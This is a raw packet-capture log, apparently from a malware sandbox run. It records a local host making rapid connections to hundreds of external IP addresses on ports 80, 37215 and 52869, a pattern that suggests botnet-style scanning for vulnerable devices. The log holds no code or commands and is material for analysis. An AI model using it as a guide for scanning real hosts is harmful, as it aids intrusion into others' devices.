                                                Jul 20, 2024 23:05:33.816612959 CEST2747880192.168.2.14112.112.0.82
                                                Jul 20, 2024 23:05:33.816612959 CEST2747880192.168.2.14112.59.68.15
                                                Jul 20, 2024 23:05:33.816822052 CEST2747880192.168.2.14112.40.193.95
                                                Jul 20, 2024 23:05:33.816822052 CEST2747880192.168.2.14112.76.194.136
                                                Jul 20, 2024 23:05:33.816822052 CEST2747880192.168.2.14112.23.235.32
                                                Jul 20, 2024 23:05:33.816822052 CEST5449480192.168.2.1495.17.124.99
                                                Jul 20, 2024 23:05:33.816822052 CEST3508280192.168.2.1495.59.134.24
                                                Jul 20, 2024 23:05:33.816822052 CEST3762080192.168.2.1495.61.168.150
                                                Jul 20, 2024 23:05:33.816822052 CEST5211480192.168.2.1495.57.6.186
                                                Jul 20, 2024 23:05:33.816994905 CEST8027478112.138.231.204192.168.2.14
                                                Jul 20, 2024 23:05:33.816999912 CEST8027478112.229.223.76192.168.2.14
                                                Jul 20, 2024 23:05:33.817003965 CEST8027478112.126.191.159192.168.2.14
                                                Jul 20, 2024 23:05:33.817017078 CEST8027478112.161.231.174192.168.2.14
                                                Jul 20, 2024 23:05:33.817024946 CEST8027478112.12.222.174192.168.2.14
                                                Jul 20, 2024 23:05:33.817028999 CEST8027478112.85.63.180192.168.2.14
                                                Jul 20, 2024 23:05:33.817034006 CEST8027478112.30.55.1192.168.2.14
                                                Jul 20, 2024 23:05:33.817065954 CEST8027478112.99.32.230192.168.2.14
                                                Jul 20, 2024 23:05:33.817070007 CEST8027478112.246.238.137192.168.2.14
                                                Jul 20, 2024 23:05:33.817075014 CEST8027478112.25.61.41192.168.2.14
                                                Jul 20, 2024 23:05:33.817080021 CEST8027478112.49.218.111192.168.2.14
                                                Jul 20, 2024 23:05:33.817084074 CEST8027478112.43.220.136192.168.2.14
                                                Jul 20, 2024 23:05:33.817146063 CEST8027478112.227.160.90192.168.2.14
                                                Jul 20, 2024 23:05:33.817151070 CEST8027478112.175.149.74192.168.2.14
                                                Jul 20, 2024 23:05:33.817154884 CEST805056895.88.159.153192.168.2.14
                                                Jul 20, 2024 23:05:33.817159891 CEST804248295.122.145.119192.168.2.14
                                                Jul 20, 2024 23:05:33.817168951 CEST805697695.216.245.126192.168.2.14
                                                Jul 20, 2024 23:05:33.817219973 CEST805825895.158.80.43192.168.2.14
                                                Jul 20, 2024 23:05:33.817224979 CEST805932495.164.165.175192.168.2.14
                                                Jul 20, 2024 23:05:33.817229033 CEST805514895.50.236.32192.168.2.14
                                                Jul 20, 2024 23:05:33.817233086 CEST803504295.156.74.111192.168.2.14
                                                Jul 20, 2024 23:05:33.817291975 CEST2747880192.168.2.14112.6.242.44
                                                Jul 20, 2024 23:05:33.817291975 CEST3452280192.168.2.14112.252.3.32
                                                Jul 20, 2024 23:05:33.817291975 CEST3452280192.168.2.14112.252.3.32
                                                Jul 20, 2024 23:05:33.817291975 CEST4617680192.168.2.1495.236.83.119
                                                Jul 20, 2024 23:05:33.817291975 CEST5537880192.168.2.1495.85.128.197
                                                Jul 20, 2024 23:05:33.817291975 CEST3498080192.168.2.14112.252.3.32
                                                Jul 20, 2024 23:05:33.817291975 CEST2747880192.168.2.14112.36.220.195
                                                Jul 20, 2024 23:05:33.817291975 CEST2747880192.168.2.14112.32.3.3
                                                Jul 20, 2024 23:05:33.817297935 CEST804204495.12.251.221192.168.2.14
                                                Jul 20, 2024 23:05:33.817302942 CEST803431695.63.149.249192.168.2.14
                                                Jul 20, 2024 23:05:33.817306995 CEST803300695.224.183.85192.168.2.14
                                                Jul 20, 2024 23:05:33.817311049 CEST803969495.67.19.107192.168.2.14
                                                Jul 20, 2024 23:05:33.817380905 CEST8027478112.11.123.223192.168.2.14
                                                Jul 20, 2024 23:05:33.817385912 CEST8027478112.226.121.157192.168.2.14
                                                Jul 20, 2024 23:05:33.817390919 CEST8027478112.169.232.30192.168.2.14
                                                Jul 20, 2024 23:05:33.817440987 CEST8027478112.104.0.150192.168.2.14
                                                Jul 20, 2024 23:05:33.817442894 CEST8027478112.73.11.34192.168.2.14
                                                Jul 20, 2024 23:05:33.817447901 CEST8027478112.157.148.140192.168.2.14
                                                Jul 20, 2024 23:05:33.817465067 CEST5286945576173.175.30.8192.168.2.14
                                                Jul 20, 2024 23:05:33.817468882 CEST8027478112.166.204.59192.168.2.14
                                                Jul 20, 2024 23:05:33.817473888 CEST8027478112.201.236.92192.168.2.14
                                                Jul 20, 2024 23:05:33.817477942 CEST8027478112.169.29.19192.168.2.14
                                                Jul 20, 2024 23:05:33.817487001 CEST8027478112.149.246.210192.168.2.14
                                                Jul 20, 2024 23:05:33.817492008 CEST8027478112.7.137.162192.168.2.14
                                                Jul 20, 2024 23:05:33.817528963 CEST4557652869192.168.2.14173.175.30.8
                                                Jul 20, 2024 23:05:33.817563057 CEST8027478112.12.221.31192.168.2.14
                                                Jul 20, 2024 23:05:33.817568064 CEST8027478112.170.49.26192.168.2.14
                                                Jul 20, 2024 23:05:33.817759991 CEST2747880192.168.2.14112.34.176.241
                                                Jul 20, 2024 23:05:33.817759991 CEST2747880192.168.2.14112.138.228.22
                                                Jul 20, 2024 23:05:33.817759991 CEST2747880192.168.2.14112.156.142.30
                                                Jul 20, 2024 23:05:33.817759991 CEST4282680192.168.2.1495.75.247.171
                                                Jul 20, 2024 23:05:33.817759991 CEST2747880192.168.2.14112.126.191.159
                                                Jul 20, 2024 23:05:33.817759991 CEST2747880192.168.2.14112.161.231.174
                                                Jul 20, 2024 23:05:33.817759991 CEST2747880192.168.2.14112.85.63.180
                                                Jul 20, 2024 23:05:33.817919016 CEST8027478112.228.160.51192.168.2.14
                                                Jul 20, 2024 23:05:33.818008900 CEST2747880192.168.2.14112.163.84.69
                                                Jul 20, 2024 23:05:33.818008900 CEST2747880192.168.2.14112.91.38.134
                                                Jul 20, 2024 23:05:33.818008900 CEST2747880192.168.2.14112.143.8.180
                                                Jul 20, 2024 23:05:33.818008900 CEST3956280192.168.2.1495.220.228.215
                                                Jul 20, 2024 23:05:33.818008900 CEST5243680192.168.2.1495.104.136.90
                                                Jul 20, 2024 23:05:33.818008900 CEST4393680192.168.2.1495.232.173.19
                                                Jul 20, 2024 23:05:33.818008900 CEST2747880192.168.2.14112.32.132.6
                                                Jul 20, 2024 23:05:33.818008900 CEST2747880192.168.2.14112.219.217.66
                                                Jul 20, 2024 23:05:33.818053007 CEST8027478112.188.45.116192.168.2.14
                                                Jul 20, 2024 23:05:33.818317890 CEST804204495.12.251.221192.168.2.14
                                                Jul 20, 2024 23:05:33.818321943 CEST8027478112.189.179.129192.168.2.14
                                                Jul 20, 2024 23:05:33.818326950 CEST803504295.156.74.111192.168.2.14
                                                Jul 20, 2024 23:05:33.818365097 CEST805514895.50.236.32192.168.2.14
                                                Jul 20, 2024 23:05:33.818370104 CEST805932495.164.165.175192.168.2.14
                                                Jul 20, 2024 23:05:33.818397999 CEST805825895.158.80.43192.168.2.14
                                                Jul 20, 2024 23:05:33.818402052 CEST805697695.216.245.126192.168.2.14
                                                Jul 20, 2024 23:05:33.818407059 CEST804248295.122.145.119192.168.2.14
                                                Jul 20, 2024 23:05:33.818411112 CEST805056895.88.159.153192.168.2.14
                                                Jul 20, 2024 23:05:33.818414927 CEST8027478112.230.134.114192.168.2.14
                                                Jul 20, 2024 23:05:33.818989992 CEST2645437215192.168.2.14157.89.222.42
                                                Jul 20, 2024 23:05:33.818998098 CEST2645437215192.168.2.1441.22.83.196
                                                Jul 20, 2024 23:05:33.818998098 CEST2645437215192.168.2.14157.205.194.169
                                                Jul 20, 2024 23:05:33.818998098 CEST2645437215192.168.2.1441.68.58.175
                                                Jul 20, 2024 23:05:33.819066048 CEST4078680192.168.2.1495.41.85.63
                                                Jul 20, 2024 23:05:33.819066048 CEST4086680192.168.2.1495.62.179.67
                                                Jul 20, 2024 23:05:33.819067001 CEST2747880192.168.2.14112.12.222.174
                                                Jul 20, 2024 23:05:33.819067001 CEST2747880192.168.2.14112.99.32.230
                                                Jul 20, 2024 23:05:33.819067001 CEST2747880192.168.2.14112.49.218.111
                                                Jul 20, 2024 23:05:33.819067001 CEST2747880192.168.2.14112.11.123.223
                                                Jul 20, 2024 23:05:33.819067001 CEST2747880192.168.2.14112.104.0.150
                                                Jul 20, 2024 23:05:33.819164038 CEST2645437215192.168.2.14168.254.120.98
                                                Jul 20, 2024 23:05:33.819164038 CEST2645437215192.168.2.1419.160.252.99
                                                Jul 20, 2024 23:05:33.819164038 CEST2645437215192.168.2.14157.236.188.205
                                                Jul 20, 2024 23:05:33.819453001 CEST2645437215192.168.2.14197.12.74.239
                                                Jul 20, 2024 23:05:33.819453001 CEST2645437215192.168.2.14121.166.254.179
                                                Jul 20, 2024 23:05:33.819453001 CEST2645437215192.168.2.14157.245.106.22
                                                Jul 20, 2024 23:05:33.819453001 CEST2645437215192.168.2.1441.137.99.196
                                                Jul 20, 2024 23:05:33.819453001 CEST2645437215192.168.2.1435.248.46.122
                                                Jul 20, 2024 23:05:33.819453001 CEST2645437215192.168.2.1441.46.108.101
                                                Jul 20, 2024 23:05:33.819453001 CEST2645437215192.168.2.1441.146.186.140
                                                Jul 20, 2024 23:05:33.819453001 CEST2645437215192.168.2.14190.243.187.16
                                                Jul 20, 2024 23:05:33.819606066 CEST2747880192.168.2.14112.52.38.59
                                                Jul 20, 2024 23:05:33.819606066 CEST6068480192.168.2.1495.211.239.130
                                                Jul 20, 2024 23:05:33.819606066 CEST5830880192.168.2.1495.136.249.39
                                                Jul 20, 2024 23:05:33.819606066 CEST4750080192.168.2.1495.191.67.246
                                                Jul 20, 2024 23:05:33.819606066 CEST5744680192.168.2.1495.81.227.113
                                                Jul 20, 2024 23:05:33.819606066 CEST3308837215192.168.2.1478.116.111.6
                                                Jul 20, 2024 23:05:33.819606066 CEST2747880192.168.2.14112.246.238.137
                                                Jul 20, 2024 23:05:33.819606066 CEST2747880192.168.2.14112.157.148.140
                                                Jul 20, 2024 23:05:33.819907904 CEST8027478112.198.0.193192.168.2.14
                                                Jul 20, 2024 23:05:33.819914103 CEST8027478112.239.21.19192.168.2.14
                                                Jul 20, 2024 23:05:33.819917917 CEST8027478112.156.1.170192.168.2.14
                                                Jul 20, 2024 23:05:33.819947958 CEST8027478112.154.58.255192.168.2.14
                                                Jul 20, 2024 23:05:33.819952011 CEST8027478112.144.0.62192.168.2.14
                                                Jul 20, 2024 23:05:33.819956064 CEST8027478112.102.217.179192.168.2.14
                                                Jul 20, 2024 23:05:33.819974899 CEST8027478112.201.87.131192.168.2.14
                                                Jul 20, 2024 23:05:33.820009947 CEST2747880192.168.2.14112.30.55.1
                                                Jul 20, 2024 23:05:33.820009947 CEST2747880192.168.2.14112.25.61.41
                                                Jul 20, 2024 23:05:33.820009947 CEST2747880192.168.2.14112.43.220.136
                                                Jul 20, 2024 23:05:33.820009947 CEST2747880192.168.2.14112.175.149.74
                                                Jul 20, 2024 23:05:33.820009947 CEST5469852869192.168.2.14138.71.112.70
                                                Jul 20, 2024 23:05:33.820009947 CEST2747880192.168.2.14112.166.204.59
                                                Jul 20, 2024 23:05:33.820009947 CEST2747880192.168.2.14112.149.246.210
                                                Jul 20, 2024 23:05:33.820009947 CEST4204480192.168.2.1495.12.251.221
                                                Jul 20, 2024 23:05:33.820372105 CEST2645437215192.168.2.1476.161.140.98
                                                Jul 20, 2024 23:05:33.820372105 CEST2645437215192.168.2.1441.122.204.224
                                                Jul 20, 2024 23:05:33.820372105 CEST2645437215192.168.2.1441.143.139.251
                                                Jul 20, 2024 23:05:33.820372105 CEST2645437215192.168.2.14197.11.233.63
                                                Jul 20, 2024 23:05:33.820372105 CEST2645437215192.168.2.14157.90.144.251
                                                Jul 20, 2024 23:05:33.820372105 CEST2645437215192.168.2.1441.160.36.229
                                                Jul 20, 2024 23:05:33.820372105 CEST2645437215192.168.2.14221.134.221.133
                                                Jul 20, 2024 23:05:33.820372105 CEST2645437215192.168.2.14157.67.241.58
                                                Jul 20, 2024 23:05:33.820437908 CEST8027478112.243.134.19192.168.2.14
                                                Jul 20, 2024 23:05:33.820442915 CEST8027478112.231.167.73192.168.2.14
                                                Jul 20, 2024 23:05:33.820450068 CEST8027478112.23.246.246192.168.2.14
                                                Jul 20, 2024 23:05:33.820453882 CEST8027478112.248.144.42192.168.2.14
                                                Jul 20, 2024 23:05:33.820494890 CEST8027478112.0.231.36192.168.2.14
                                                Jul 20, 2024 23:05:33.820504904 CEST8027478112.54.25.56192.168.2.14
                                                Jul 20, 2024 23:05:33.820518970 CEST8027478112.6.50.204192.168.2.14
                                                Jul 20, 2024 23:05:33.820523977 CEST8027478112.141.40.94192.168.2.14
                                                Jul 20, 2024 23:05:33.820528030 CEST8027478112.232.150.153192.168.2.14
                                                Jul 20, 2024 23:05:33.820564985 CEST8027478112.115.6.54192.168.2.14
                                                Jul 20, 2024 23:05:33.820570946 CEST8027478112.208.206.251192.168.2.14
                                                Jul 20, 2024 23:05:33.820574999 CEST8027478112.89.58.166192.168.2.14
                                                Jul 20, 2024 23:05:33.820580006 CEST8027478112.241.172.244192.168.2.14
                                                Jul 20, 2024 23:05:33.820717096 CEST8027478112.29.184.50192.168.2.14
                                                Jul 20, 2024 23:05:33.820723057 CEST8027478112.25.68.85192.168.2.14
                                                Jul 20, 2024 23:05:33.820728064 CEST8027478112.74.33.245192.168.2.14
                                                Jul 20, 2024 23:05:33.820770979 CEST2645437215192.168.2.14157.62.244.159
                                                Jul 20, 2024 23:05:33.820770979 CEST2645437215192.168.2.1441.73.94.59
                                                Jul 20, 2024 23:05:33.820770979 CEST2645437215192.168.2.142.171.125.132
                                                Jul 20, 2024 23:05:33.820770979 CEST2645437215192.168.2.14197.251.167.66
                                                Jul 20, 2024 23:05:33.820770979 CEST2645437215192.168.2.14157.236.229.185
                                                Jul 20, 2024 23:05:33.820771933 CEST2645437215192.168.2.14209.90.200.214
                                                Jul 20, 2024 23:05:33.820771933 CEST2645437215192.168.2.14197.48.141.30
                                                Jul 20, 2024 23:05:33.820771933 CEST2645437215192.168.2.1441.188.188.183
                                                Jul 20, 2024 23:05:33.820790052 CEST8027478112.19.146.164192.168.2.14
                                                Jul 20, 2024 23:05:33.820795059 CEST8027478112.158.146.232192.168.2.14
                                                Jul 20, 2024 23:05:33.820862055 CEST8027478112.229.146.45192.168.2.14
                                                Jul 20, 2024 23:05:33.821044922 CEST8027478112.25.209.156192.168.2.14
                                                Jul 20, 2024 23:05:33.821049929 CEST8027478112.69.188.24192.168.2.14
                                                Jul 20, 2024 23:05:33.821054935 CEST8027478112.129.160.216192.168.2.14
                                                Jul 20, 2024 23:05:33.821131945 CEST8027478112.182.118.230192.168.2.14
                                                Jul 20, 2024 23:05:33.821136951 CEST8027478112.248.17.133192.168.2.14
                                                Jul 20, 2024 23:05:33.821211100 CEST803300695.224.183.85192.168.2.14
                                                Jul 20, 2024 23:05:33.821445942 CEST8027478112.38.229.160192.168.2.14
                                                Jul 20, 2024 23:05:33.821523905 CEST8027478112.176.184.168192.168.2.14
                                                Jul 20, 2024 23:05:33.822060108 CEST2645437215192.168.2.1441.246.61.213
                                                Jul 20, 2024 23:05:33.822060108 CEST2645437215192.168.2.14198.80.184.222
                                                Jul 20, 2024 23:05:33.822060108 CEST2645437215192.168.2.14197.66.152.192
                                                Jul 20, 2024 23:05:33.822060108 CEST2645437215192.168.2.14197.254.29.255
                                                Jul 20, 2024 23:05:33.822060108 CEST2645437215192.168.2.1441.42.135.218
                                                Jul 20, 2024 23:05:33.822060108 CEST2645437215192.168.2.1441.122.69.124
                                                Jul 20, 2024 23:05:33.822060108 CEST2645437215192.168.2.14189.151.82.226
                                                Jul 20, 2024 23:05:33.822060108 CEST2645437215192.168.2.14197.34.57.131
                                                Jul 20, 2024 23:05:33.822726965 CEST8027478112.60.212.240192.168.2.14
                                                Jul 20, 2024 23:05:33.822732925 CEST808145592213.125.79.161192.168.2.14
                                                Jul 20, 2024 23:05:33.822741032 CEST8027478112.5.135.29192.168.2.14
                                                Jul 20, 2024 23:05:33.822752953 CEST8027478112.248.160.186192.168.2.14
                                                Jul 20, 2024 23:05:33.822762966 CEST8027478112.252.119.226192.168.2.14
                                                Jul 20, 2024 23:05:33.822770119 CEST8027478112.250.10.10192.168.2.14
                                                Jul 20, 2024 23:05:33.822856903 CEST2747880192.168.2.14112.7.137.162
                                                Jul 20, 2024 23:05:33.822856903 CEST2747880192.168.2.14112.188.45.116
                                                Jul 20, 2024 23:05:33.822858095 CEST5492280192.168.2.14112.157.87.162
                                                Jul 20, 2024 23:05:33.822858095 CEST3504280192.168.2.1495.156.74.111
                                                Jul 20, 2024 23:05:33.822858095 CEST2747880192.168.2.14112.189.179.129
                                                Jul 20, 2024 23:05:33.822858095 CEST5825880192.168.2.1495.158.80.43
                                                Jul 20, 2024 23:05:33.822858095 CEST4248280192.168.2.1495.122.145.119
                                                Jul 20, 2024 23:05:33.822858095 CEST5056880192.168.2.1495.88.159.153
                                                Jul 20, 2024 23:05:33.822865009 CEST8027478112.208.144.82192.168.2.14
                                                Jul 20, 2024 23:05:33.822870016 CEST8027478112.95.4.99192.168.2.14
                                                Jul 20, 2024 23:05:33.822874069 CEST8027478112.16.161.245192.168.2.14
                                                Jul 20, 2024 23:05:33.822877884 CEST8027478112.158.209.47192.168.2.14
                                                Jul 20, 2024 23:05:33.822887897 CEST8027478112.40.193.95192.168.2.14
                                                Jul 20, 2024 23:05:33.822892904 CEST8027478112.64.225.73192.168.2.14
                                                Jul 20, 2024 23:05:33.822957039 CEST8027478112.57.4.227192.168.2.14
                                                Jul 20, 2024 23:05:33.823174000 CEST2645437215192.168.2.14157.118.67.134
                                                Jul 20, 2024 23:05:33.823174000 CEST2645437215192.168.2.1441.39.92.88
                                                Jul 20, 2024 23:05:33.823174000 CEST2645437215192.168.2.14197.24.161.111
                                                Jul 20, 2024 23:05:33.823174953 CEST2645437215192.168.2.14197.208.45.245
                                                Jul 20, 2024 23:05:33.823174953 CEST2645437215192.168.2.14197.246.194.134
                                                Jul 20, 2024 23:05:33.823174953 CEST2645437215192.168.2.14197.184.30.142
                                                Jul 20, 2024 23:05:33.823174953 CEST2645437215192.168.2.1441.22.158.104
                                                Jul 20, 2024 23:05:33.823174953 CEST2645437215192.168.2.1441.202.204.131
                                                Jul 20, 2024 23:05:33.823249102 CEST2645437215192.168.2.14197.51.143.128
                                                Jul 20, 2024 23:05:33.823249102 CEST2645437215192.168.2.14157.240.158.223
                                                Jul 20, 2024 23:05:33.823249102 CEST2645437215192.168.2.1441.31.139.208
                                                Jul 20, 2024 23:05:33.823249102 CEST2645437215192.168.2.14157.66.241.151
                                                Jul 20, 2024 23:05:33.823249102 CEST2645437215192.168.2.14157.217.194.235
                                                Jul 20, 2024 23:05:33.823249102 CEST2645437215192.168.2.14157.179.229.77
                                                Jul 20, 2024 23:05:33.823249102 CEST2645437215192.168.2.14176.39.181.27
                                                Jul 20, 2024 23:05:33.823249102 CEST2645437215192.168.2.14157.65.181.8
                                                Jul 20, 2024 23:05:33.823319912 CEST8027478112.103.109.81192.168.2.14
                                                Jul 20, 2024 23:05:33.823324919 CEST8027478112.71.67.17192.168.2.14
                                                Jul 20, 2024 23:05:33.823332071 CEST8027478112.199.199.238192.168.2.14
                                                Jul 20, 2024 23:05:33.823345900 CEST8027478112.69.208.119192.168.2.14
                                                Jul 20, 2024 23:05:33.823355913 CEST8027478112.76.194.136192.168.2.14
                                                Jul 20, 2024 23:05:33.823359966 CEST8027478112.23.235.32192.168.2.14
                                                Jul 20, 2024 23:05:33.823364973 CEST8027478112.32.133.129192.168.2.14
                                                Jul 20, 2024 23:05:33.823369026 CEST8027478112.1.133.120192.168.2.14
                                                Jul 20, 2024 23:05:33.823374033 CEST8027478112.107.190.151192.168.2.14
                                                Jul 20, 2024 23:05:33.823379993 CEST8027478112.159.120.252192.168.2.14
                                                Jul 20, 2024 23:05:33.823455095 CEST8027478112.6.242.44192.168.2.14
                                                Jul 20, 2024 23:05:33.823676109 CEST2645437215192.168.2.1441.18.253.132
                                                Jul 20, 2024 23:05:33.823676109 CEST2645437215192.168.2.14216.40.161.191
                                                Jul 20, 2024 23:05:33.823676109 CEST2645437215192.168.2.14197.49.64.243
                                                Jul 20, 2024 23:05:33.823676109 CEST2645437215192.168.2.14197.106.145.99
                                                Jul 20, 2024 23:05:33.823676109 CEST2645437215192.168.2.1473.67.77.48
                                                Jul 20, 2024 23:05:33.823676109 CEST2645437215192.168.2.14197.84.1.213
                                                Jul 20, 2024 23:05:33.823677063 CEST2645437215192.168.2.14157.46.65.202
                                                Jul 20, 2024 23:05:33.823677063 CEST2645437215192.168.2.14197.86.16.39
                                                Jul 20, 2024 23:05:33.824239969 CEST8027478112.163.84.69192.168.2.14
                                                Jul 20, 2024 23:05:33.824337006 CEST8034522112.252.3.32192.168.2.14
                                                Jul 20, 2024 23:05:33.824465990 CEST8027478112.91.38.134192.168.2.14
                                                Jul 20, 2024 23:05:33.824471951 CEST8027478112.143.8.180192.168.2.14
                                                Jul 20, 2024 23:05:33.824779034 CEST2747880192.168.2.14112.143.130.83
                                                Jul 20, 2024 23:05:33.824779034 CEST2747880192.168.2.14112.251.132.95
                                                Jul 20, 2024 23:05:33.824779034 CEST2747880192.168.2.14112.73.54.176
                                                Jul 20, 2024 23:05:33.824779034 CEST2747880192.168.2.14112.127.208.204
                                                Jul 20, 2024 23:05:33.824779987 CEST2747880192.168.2.14112.104.222.200
                                                Jul 20, 2024 23:05:33.824779987 CEST2747880192.168.2.14112.155.118.67
                                                Jul 20, 2024 23:05:33.824779987 CEST2747880192.168.2.14112.122.90.204
                                                Jul 20, 2024 23:05:33.824779987 CEST2747880192.168.2.14112.185.4.13
                                                Jul 20, 2024 23:05:33.825103045 CEST2645437215192.168.2.1441.162.169.218
                                                Jul 20, 2024 23:05:33.825103045 CEST2645437215192.168.2.1441.226.32.60
                                                Jul 20, 2024 23:05:33.825103045 CEST2645437215192.168.2.14157.114.192.146
                                                Jul 20, 2024 23:05:33.825103045 CEST2645437215192.168.2.14197.144.222.172
                                                Jul 20, 2024 23:05:33.825103045 CEST2645437215192.168.2.1441.136.114.174
                                                Jul 20, 2024 23:05:33.825103045 CEST2645437215192.168.2.1441.35.190.133
                                                Jul 20, 2024 23:05:33.825103045 CEST2645437215192.168.2.14197.163.217.50
                                                Jul 20, 2024 23:05:33.825103045 CEST2645437215192.168.2.1438.156.148.132
                                                Jul 20, 2024 23:05:33.825161934 CEST2645437215192.168.2.14157.194.68.22
                                                Jul 20, 2024 23:05:33.825161934 CEST2645437215192.168.2.14157.163.186.43
                                                Jul 20, 2024 23:05:33.825161934 CEST2645437215192.168.2.14197.87.125.169
                                                Jul 20, 2024 23:05:33.825161934 CEST2645437215192.168.2.1441.133.50.245
                                                Jul 20, 2024 23:05:33.825161934 CEST2645437215192.168.2.1466.225.222.54
                                                Jul 20, 2024 23:05:33.825161934 CEST2645437215192.168.2.1441.199.106.123
                                                Jul 20, 2024 23:05:33.825161934 CEST2645437215192.168.2.1417.112.185.137
                                                Jul 20, 2024 23:05:33.825161934 CEST2645437215192.168.2.14157.192.224.148
                                                Jul 20, 2024 23:05:33.825315952 CEST803356895.101.7.150192.168.2.14
                                                Jul 20, 2024 23:05:33.825321913 CEST372152645441.22.83.196192.168.2.14
                                                Jul 20, 2024 23:05:33.825447083 CEST3721526454157.89.222.42192.168.2.14
                                                Jul 20, 2024 23:05:33.825453043 CEST3721526454157.205.194.169192.168.2.14
                                                Jul 20, 2024 23:05:33.825457096 CEST3721526454197.12.74.239192.168.2.14
                                                Jul 20, 2024 23:05:33.825462103 CEST8034980112.252.3.32192.168.2.14
                                                Jul 20, 2024 23:05:33.825470924 CEST372152645441.68.58.175192.168.2.14
                                                Jul 20, 2024 23:05:33.825700998 CEST3721526454168.254.120.98192.168.2.14
                                                Jul 20, 2024 23:05:33.825709105 CEST372152645476.161.140.98192.168.2.14
                                                Jul 20, 2024 23:05:33.825742960 CEST2747880192.168.2.14112.173.49.6
                                                Jul 20, 2024 23:05:33.825742960 CEST2747880192.168.2.14112.92.81.173
                                                Jul 20, 2024 23:05:33.825742960 CEST4784280192.168.2.1495.182.35.196
                                                Jul 20, 2024 23:05:33.825742960 CEST5760480192.168.2.1495.7.161.207
                                                Jul 20, 2024 23:05:33.825742960 CEST3655080192.168.2.1495.234.250.137
                                                Jul 20, 2024 23:05:33.825743914 CEST2747880192.168.2.14112.67.53.142
                                                Jul 20, 2024 23:05:33.825743914 CEST2747880192.168.2.14112.227.160.90
                                                Jul 20, 2024 23:05:33.825743914 CEST2747880192.168.2.14112.169.232.30
                                                Jul 20, 2024 23:05:33.825750113 CEST372152645419.160.252.99192.168.2.14
                                                Jul 20, 2024 23:05:33.825787067 CEST372152645441.122.204.224192.168.2.14
                                                Jul 20, 2024 23:05:33.825793028 CEST3721526454121.166.254.179192.168.2.14
                                                Jul 20, 2024 23:05:33.825886011 CEST3721526454157.236.188.205192.168.2.14
                                                Jul 20, 2024 23:05:33.826004028 CEST372152645441.143.139.251192.168.2.14
                                                Jul 20, 2024 23:05:33.826124907 CEST3721526454157.245.106.22192.168.2.14
                                                Jul 20, 2024 23:05:33.826129913 CEST3721526454197.11.233.63192.168.2.14
                                                Jul 20, 2024 23:05:33.826347113 CEST3721526454157.62.244.159192.168.2.14
                                                Jul 20, 2024 23:05:33.826351881 CEST3721526454157.90.144.251192.168.2.14
                                                Jul 20, 2024 23:05:33.826508999 CEST372152645441.73.94.59192.168.2.14
                                                Jul 20, 2024 23:05:33.826644897 CEST372152645441.160.36.229192.168.2.14
                                                Jul 20, 2024 23:05:33.826808929 CEST3721526454221.134.221.133192.168.2.14
                                                Jul 20, 2024 23:05:33.826813936 CEST37215264542.171.125.132192.168.2.14
                                                Jul 20, 2024 23:05:33.826946020 CEST3721526454157.67.241.58192.168.2.14
                                                Jul 20, 2024 23:05:33.827022076 CEST2645437215192.168.2.1441.217.219.43
                                                Jul 20, 2024 23:05:33.827022076 CEST2645437215192.168.2.14157.80.69.131
                                                Jul 20, 2024 23:05:33.827022076 CEST2645437215192.168.2.14157.111.235.165
                                                Jul 20, 2024 23:05:33.827023029 CEST2645437215192.168.2.1441.116.104.162
                                                Jul 20, 2024 23:05:33.827023029 CEST2645437215192.168.2.14157.147.207.148
                                                Jul 20, 2024 23:05:33.827023029 CEST2645437215192.168.2.14197.179.96.151
                                                Jul 20, 2024 23:05:33.827023029 CEST4234037215192.168.2.14197.112.26.200
                                                Jul 20, 2024 23:05:33.827023029 CEST4859037215192.168.2.14157.183.110.42
                                                Jul 20, 2024 23:05:33.827047110 CEST372152645441.137.99.196192.168.2.14
                                                Jul 20, 2024 23:05:33.827086926 CEST372152645441.246.61.213192.168.2.14
                                                Jul 20, 2024 23:05:33.827091932 CEST372152645435.248.46.122192.168.2.14
                                                Jul 20, 2024 23:05:33.827148914 CEST3721526454198.80.184.222192.168.2.14
                                                Jul 20, 2024 23:05:33.827208996 CEST2645437215192.168.2.14157.190.121.126
                                                Jul 20, 2024 23:05:33.827208996 CEST2645437215192.168.2.14197.247.148.108
                                                Jul 20, 2024 23:05:33.827208996 CEST2645437215192.168.2.14173.208.23.214
                                                Jul 20, 2024 23:05:33.827208996 CEST2645437215192.168.2.14157.134.172.46
                                                Jul 20, 2024 23:05:33.827208996 CEST2645437215192.168.2.14157.200.125.106
                                                Jul 20, 2024 23:05:33.827208996 CEST4363837215192.168.2.14197.164.78.122
                                                Jul 20, 2024 23:05:33.827208996 CEST5536637215192.168.2.1431.226.75.152
                                                Jul 20, 2024 23:05:33.827208996 CEST4729437215192.168.2.14186.23.77.122
                                                Jul 20, 2024 23:05:33.827461004 CEST3721526454197.251.167.66192.168.2.14
                                                Jul 20, 2024 23:05:33.827477932 CEST3721526454197.66.152.192192.168.2.14
                                                Jul 20, 2024 23:05:33.827481985 CEST372152645441.46.108.101192.168.2.14
                                                Jul 20, 2024 23:05:33.827486992 CEST3721526454197.254.29.255192.168.2.14
                                                Jul 20, 2024 23:05:33.827608109 CEST372152645441.146.186.140192.168.2.14
                                                Jul 20, 2024 23:05:33.827759981 CEST372152645441.42.135.218192.168.2.14
                                                Jul 20, 2024 23:05:33.827804089 CEST3721526454157.236.229.185192.168.2.14
                                                Jul 20, 2024 23:05:33.827935934 CEST2747880192.168.2.14112.169.29.19
                                                Jul 20, 2024 23:05:33.827935934 CEST2645437215192.168.2.1489.139.16.178
                                                Jul 20, 2024 23:05:33.827936888 CEST2645437215192.168.2.14157.4.55.26
                                                Jul 20, 2024 23:05:33.827936888 CEST2645437215192.168.2.14157.213.58.7
                                                Jul 20, 2024 23:05:33.827936888 CEST2645437215192.168.2.1441.250.147.204
                                                Jul 20, 2024 23:05:33.827936888 CEST2645437215192.168.2.14134.212.45.105
                                                Jul 20, 2024 23:05:33.827936888 CEST2645437215192.168.2.14157.234.25.50
                                                Jul 20, 2024 23:05:33.827936888 CEST2645437215192.168.2.14185.42.8.255
                                                Jul 20, 2024 23:05:33.828480005 CEST3721526454209.90.200.214192.168.2.14
                                                Jul 20, 2024 23:05:33.828509092 CEST372152645441.122.69.124192.168.2.14
                                                Jul 20, 2024 23:05:33.828514099 CEST3721526454197.48.141.30192.168.2.14
                                                Jul 20, 2024 23:05:33.828519106 CEST3721526454190.243.187.16192.168.2.14
                                                Jul 20, 2024 23:05:33.828552008 CEST372152645441.188.188.183192.168.2.14
                                                Jul 20, 2024 23:05:33.828557014 CEST3721526454189.151.82.226192.168.2.14
                                                Jul 20, 2024 23:05:33.828561068 CEST3721526454197.51.143.128192.168.2.14
                                                Jul 20, 2024 23:05:33.828792095 CEST3721526454157.240.158.223192.168.2.14
